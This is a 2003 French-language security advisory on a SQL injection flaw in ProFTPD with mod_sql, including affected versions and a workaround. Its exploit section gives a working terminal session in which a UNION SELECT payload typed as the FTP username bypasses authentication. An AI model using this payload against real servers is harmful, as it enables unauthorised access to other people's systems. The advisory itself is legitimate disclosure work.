Date de Publication: 2003-06-19
 Titre: ProFTPD mod_sql SQL Injection Vulenarbility
 K-Otik ID : 0192
 Exploitable à distance : Oui
 Exploitable en local : Oui

 
 * Description Technique - Exploit *
 
ProFTPD combiné à mod_sql souffre d'une vulnérabilité de type SQL Injection. Elle peut etre exploitée par un attaquant distant afin d'avoir accès au ftp sans authentification.

------------------------ Exploit -----------------------
root@root:~/$ ftp localhost
Connected to localhost.
220 ProFTPD 1.2.8 Server (Debian) [*****]
Name (localhost:runlevel): ')UNION SELECT
'u','p',1001,1001,'/tmp','/bin/bash' WHERE(''='
331 Password required for ')UNION.
Password:
230 User ')UNION SELECT 'u','p',1001,1001,'/tmp'
,'/bin/bash' WHERE(''=' logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
--------------------------------------------------------


  * Versions Vulnérables *

ProFTPD version 1.2.9rc1 (et inférieures)
 
Faille testée avec :

mod_sql v.4.0
postgresql 7.2.1-2
proftpd 1.2.8


  * Solution *
 
Aucune patch officiel pour l'instant.
Ne pas utiliser mod_sql avec ProFTPD (avant la publication d'un patch)


  * Crédits *
 
Failles découverte par runlevel (Juin 2003).